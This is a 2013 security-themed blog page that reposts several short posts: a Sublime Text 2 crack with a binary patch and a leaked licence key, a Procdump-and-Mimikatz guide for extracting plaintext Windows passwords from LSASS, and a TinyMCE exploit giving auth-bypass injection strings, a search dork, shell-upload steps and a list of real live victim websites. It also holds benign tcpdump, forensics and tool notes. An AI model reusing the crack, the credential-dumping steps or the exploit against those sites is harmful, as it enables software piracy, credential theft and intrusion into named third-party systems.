Nov 8, 2013

Crack: Register Sublime 2 with Free!!![MacOSX Version]

 1. cd /Applications/Sublime\ Text\ 2.app/Contents/MacOS/
2. edit file ->> “vim Sublime\ Text\ 2″
3. change to hex mode ->> “:$!xxd”
4. find and replace ->> “:%s/5BE509C33B020111/5BE509C32B020111/g”



Input license
—–BEGIN LICENSE—–
Patrick Carey
Unlimited User License
EA7E-18848
4982D83B6313800EBD801600D7E3CC13
F2CD59825E2B4C4A18490C5815DF68D6
A5EFCC8698CFE589E105EA829C5273C0
C5744F0857FAD2169C88620898C3845A
1F4521CFC160EEC7A9B382DE605C2E6D
DE84CD0160666D30AA8A0C5492D90BB2
75DEFB9FD0275389F74A59BB0CA2B4EF
EA91E646C7F2A688276BCF18E971E372
—–END LICENSE—–


Source: http://shobhitjain26.wordpress.com/tag/sublime-license-key/



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Hashtag - Hash identified tool

Usage: HashTag.py {-sh hash |-f file |-d directory} [-o output_filename] [-hc] [-n]
-h, --help show this help message and exit
-sh SINGLEHASH, --singleHash SINGLEHASH Identify a single hash
-f FILE, --file FILE Parse a single file for hashes and identify them
-d DIRECTORY, --directory DIRECTORY Parse, identify, and categorize hashes within a directory and all subdirectories
-o OUTPUT, --output OUTPUT Filename to output full list of all identified hashes
--file default filename: HashTag/HashTag_Output_File.txt
--directory default filename: HashTag/HashTag_Hash_File.txt
-hc, --hashcatOutput --file: Output a file per different hash type found, if corresponding hashcat mode exists
--directory: Appends hashcat mode to end of separate files
-n, --notFound --file: Include unidentifiable hashes in the output file. Good for tool debugging (Is it Identifying properly?)
Identify a single hash (-sh):

HashTag.py -sh $1$MtCReiOj$zvOdxVzPtrQ.PXNW3hTHI0


Download Link: https://raw.github.com/SmeegeSec/HashTag/master/HashTag.py 

Source: http://www.smeegesec.com/2013/11/hashtag-password-hash-identification.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 7, 2013

Howto: Uninstall with setup.py script

1. To record list of installed files, you can use:
python setup.py install --record files.txt
 
2. uninstall you can use xargs to do the removal:
cat files.txt | xargs rm -rf

 



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Howto: Install scapy in Mac OSX

1. Install Xcode and Command Tool

2. Install Scapy
$ wget scapy.net
$ unzip scapy-latest.zip
$ cd scapy-2.*
$ sudo python setup.py install


3. Install Pylibpcap, Download from http://sourceforge.net/projects/pylibpcap/ and extract it
$ python setup.py install

4. Download and install libdnet(Fix ImportError: No module named dnet)
$ port selfupdate
$ port upgrade outdated
$ port install py27-libdnet
$ port install libdnet
$ cp /opt/local/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/site-packages/dnet.so /Library/Python/2.7/site-packages
5. Change some code in /Library/Python/2.7/site-packages/scapy/arch/unix.py(Fix OSError: Device not configured)

line 34 : f=os.popen("netstat -rn") # -f inet
Change for : f=os.popen("netstat -rn | grep -v vboxnet") # -f inet

def read_routes():
    if scapy.arch.SOLARIS:
#       f=os.popen("netstat -rvn") # -f inet
        f=os.popen("netstat -rn | grep -v vboxnet | grep -v bridge")


 Line: 37 Too: f=os.popen("netstat -rn | grep -v vboxnet | grep -v bridge")


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 6, 2013

Howto: Tcpdump filter HTTP

#### Filter HTTP GET Request
sudo tcpdump -s 0 -A 'tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x47455420'
OR 
tcpdump -i eth1 'tcp[32:4] = 0x47455420'
 
#### Filter HTTP POST Request
sudo tcpdump -s 0 -A 'tcp dst port 80 and (tcp[((tcp[12:1] & 0xf0) >> 2):4] = 0x504f5354)' 

# monitor HTTP traffic including request and response headers and message body
# cf. https://sites.google.com/site/jimmyxu101/testing/use-tcpdump-to-monitor-http-traffic
tcpdump -A -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'
tcpdump -X -s 0 'tcp port 80 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf0)>>2)) != 0)'

 

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 5, 2013

Howto: Plaintext passwords with Procdump and Mimikatz Alpha

1. Upload the “Procdump” Microsoft tool to the server. 2. Dump the memory space of lsass process to the file lsass.dmp with the commands:
C:\temp\procdump.exe -accepteula  -ma lsass.exe lsass.dmp    For 32 bits
C:\temp\procdump.exe -accepteula -64 -ma lsass.exe  lsass.dmp  For 64 bits
3. Download the file lsass.dmp generated. 4. Launch mimikatz alpha against the lsass.dmp file with the commands:
mimikatz # sekurlsa::minidump lsass.dmp
Switch to MINIDUMP

mimikatz # sekurlsa::logonPasswords full


Source: http://www.securityartwork.es/2013/11/04/plaintext-passwords-with-procdump-and-mimikatz-alpha/?lang=en


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Formoid easiest form generator

Formoid makes creating beautiful web forms a cinch and a joy. With a no-coding drag-n-drop GUI, trendy Flat, Metro, Bootstrap form themes, pure css styled, responsive, retina-ready form elements, as-you-type validation, anti-spam captcha - Formoid is a just incredible form tool!

Source: http://formoid.com/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Nov 4, 2013

Windows Forensic Command

1. Name of System and the Current Time:
C:\>hostname
WIN-xxxxxxxxx7
C:\>whoami
win-xxxxxxxxxx7\my name
C:\>echo %DATE% %TIME%
Fri 01/20/2012 20:52:34.28
C:\>wmic timezone list brief
Bias  Caption            SettingID
540   (UTC+09:00) Seoul

2. IP Address of the targeted system: 
C:\>ipconfig /allcompartments /all

3. Serial number of the system (this is going to be a bit off since I am on a Vmware instance):
C:\>wmic csproduct get name
Name
VMware Virtual Platform
C:\>wmic bios get serialnumber
SerialNumber
VMware-00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00

4. OS of the targeted system:
C:\>systeminfo | findstr /B /C:”OS Name” /C:”OS Version”CREDIT
OS Name:                   Microsoft Windows 7 Ultimate
OS Version:                6.1.7601 Service Pack 1 Build 7601
C:\>ver
Microsoft Windows [Version 6.1.7601]

5. MAC Address of the system NIC:
C:\>wmic nicconfig get description,IPAddress,MACaddress
Description                               IPAddress          MACAddress
Intel(R) PRO/1000 MT Network Connection   {“192.168.1.151″}  00:00:00:00:00:00
RAS Async Adapter                                            00:00:00:00:00:00
Bluetooth Device (Personal Area Network)
—-cut out some output—-

6. How long has the system been online:
C:\>uptime.exe
\\WIN-xxxxxxxxxx7 has been up for: 0 day(s), 0 hour(s), 34 minute(s), 37 second(s)
7. Date and/or Level of Latest Patch:
C:\>wmic qfe get Hotfixid or if you wanted a bit more detail with dates C:\>wmic qfe list
HotFixID
KB971033
KB2305420
KB2393802
KB2425227
—-cut out most of the output—-

8. System Hardware:
C:\>wmic computersystem get manufacturer (assuming this would say, “Dell” if I was on a physical machine)
Manufacturer
VMware, Inc.

9. Software Installed on the System: I prefer wmic product list the best because it pulls install dates.
C:\>wmic product list
C:\>reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall

10. Do you have EFS running on the system?
C:\>cipher /y
EFS certificate thumbprint for computer WIN-xxxxxxxxxx7:
  0000 0000 0000 0000 0000 0000 0000 0000 0000 0000
C:\>cipher /s:”New Folder”
Listing C:\New Folder\
New files added to this directory will be encrypted.
E Meh.txt
E Foo.txt
E = Encrypted

11. Is there a firewall protecting the system? If so, do you have logs?
C:\>copy %windir%\System32\Logfiles\Firewall\*.log
C:\>netsh firewall show state
C:\>netsh firewall show config
C:\>netsh dump 
Try these yourself. Too much information to paste here.

12. Is there any volatile network data?
C:\>route print
C:\>arp -A
C:\>netstat -ano
Active Connections
  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       684
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:49152          0.0.0.0:0              LISTENING       392
—–cut out most of the output—–
C:\>net start
These Windows services are started:
   Application Information
   Background Intelligent Transfer Service
   Base Filtering Engine
   Bluetooth Support Service
   COM+ Event System
—–cut out most of the output—–
C:\>net user and C:\>wmic useraccount list
User accounts for \\WIN-xxxxxxxxxx7
—————————————————————
Administrator            Guest                    My Name
The command completed successfully.
C:\>net use
New connections will be remembered.
Status       Local     Remote                    Network
———————————————————————
Z:        \\vmware-host\Shared Folders VMware Shared Folders
The command completed successfully.
C:\>type %windir%\System32\drivers\etc\hosts
# localhost name resolution is handled within DNS itself.
#       127.0.0.1       localhost
#       ::1             localhost
C:\>type %windir%\System32\drivers\etc\networks
# For example:
#
#    loopback     127
#    campus       284.122.107
#    london       284.122.108
loopback                 127

14. Are there event logs?
C:\>wmic nteventlog get nameUse this output to create the next command
C:\>copy %windir%\System32\Winevt\Logs\*.evtx
Those were all of the questions asked on the incident response checklist I found online. My work one is much more detailed, but I don’t have permission to release all of its contents nor will I get permission. I suggest all of you go through the “actionable” items so you’re not surprised when an incident DOES occur (not IF).
Other “general questions” to ask in no particular order are:
Point of contact information.
What is the system used for?
What kind of information is stored on this system (Classified, PII, etc.)?
Is it public facing, or is it an internal system?
Is it a server or workstation?
Other Commands and Tools to run to collect information:
wmic process list status
wmic process list memory
wmic job list brief
wmic startup list brief
wmic ntdomain list brief
wmic service list config
handle.exe /accepteula
gplist
listdlls.exe
logonsessions.exe /accepteula
pslist.exe /accepteula
psloggedon.exe /accepteula
tasklist
tcpvcon.exe -a /accepteula


Source:  http://sysforensics.org/2012/01/incident-response-checklist-actions.html


If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: umap

umap is a tool which allows you to test the security of USB host implementations i.e. something you plug a USB device into, like a PC or a tablet. Its primary function at the moment is a fuzzer with test cases based on a combination of data from standards documentation and the author's experience of where USB bugs are commonly found. However, it also has additional functionality that will be expanded further in future versions, for example:
  • Operating system identification
  • Installed application identification
  • Vendor-specific driver enumeration
  • Endpoint Protection System assessment
Source: https://github.com/nccgroup/umap/wiki/umap-documentation



If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

> Title : TinyMCE v3.2.x <= (AuthBypass/ShellUpload) Multiple Vulnerabilites

> Author : KedAns-Dz
+ E-mail : ked-h (@hotmail.com / @1337day.com)
+ FaCeb0ok : fb.me/Inj3ct0rK3d
+ TwiTter : @kedans

# Platform : PHP / WebApp
+ Cat/Tag : Shell / File Upload , Auth Bypassing , Multiple

*************************************************************************/

# TinyMCE v3.2.7 or ..X is suffer from Multiple vuln's / bug :p
# Remote Attacker can bypassin auth and upload files , shell's etc...
# 1st try with this dork :
google dork : allinurl:/plugins/imagemanager/pages/im/index.html

# (1) how to bypass auth? =>
you can bypass auth by simple poc of bypassing like
  site.tld/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
  user & pass : '1'OR'1'
 =+ demo's :
 http://www.prodigy-school.ru/jscripts/tiny_mce/plugins/imagemanager/login_session_auth.php
 user : '1'OR'1'
 pass : '1'OR'1'
 http://www.erez-komarovsky.co.il/admin/login.php
 user: 1' OR '1'='1
 pass: 1' OR '1'='1
 
 && or ( if the simple poc d'nt workin after u access :
 site.tld/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html )
 clic rapidly of the button stop in browser for stop the redirction ;)
 
# (2) Upload Shell/Files .. (.txt .gif) or (.php by use temperData or http header :D ) =>

poc : site.tld/[path]/plugins/imagemanager/pages/im/index.html
and clic in ( upload / add / [+] ) button & upload what you need ;)
for ex:
    shell after up : http://www.prodigy-school.ru/data/r57.txt

 =+ Demo's:
  
http://www.allemandemusic.com.hostbaby.com/dashboard/js/tiny_mce-3.2.7/plugins/imagemanager/pages/im/index.html
http://gesundheit-gt.de/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.yorkshiredales-stay.co.uk/maintain/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.erez-komarovsky.co.il/admin/include/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://freewb.hu/freewbr/tinymce/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html
http://volunteermckinney.galaxydigital.com/includes/tiny_mce/plugins/imagemanager/pages/im/index.html
http://www.eastpennsd.org/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.htm
http://209.18.48.74/progfiles/tinymce3JQ/jscripts/tiny_mce/plugins/imagemanager/pages/im/index.html

# Take care kid's & 1337day Fan's :D
# Ked is Back ^_^ <3

####
#<! THE END ^_* ! , Good Luck all <3 | 1337-DAY Aint DIE ^_^  !>
#<+ Proof Of Concept & Exploit Hunted by : Khaled [KedAns-Dz] +>
#<+ Copyright © 2013 Inj3ct0r Team | 1337day Exploit Database.+>
# ** Greetings : < Dz Offenders Cr3w [&] Algerian Cyber Army > *
# ** ! Hassi Messaoud <3 1850 Hood <3 , Dedicate fr0m Algeria **
####

# F88A739D05F6206B   1337day.com [2013-11-04]   5B04A50E2B56698D #



Source: http://1337day.com/exploit/21454




If you like my blog, Please Donate Me
Or Click The Banner For Support Me.
 

Sponsors

lusovps.com

Blogroll

About

 Please subscribe my blog.

 Old Subscribe

Share |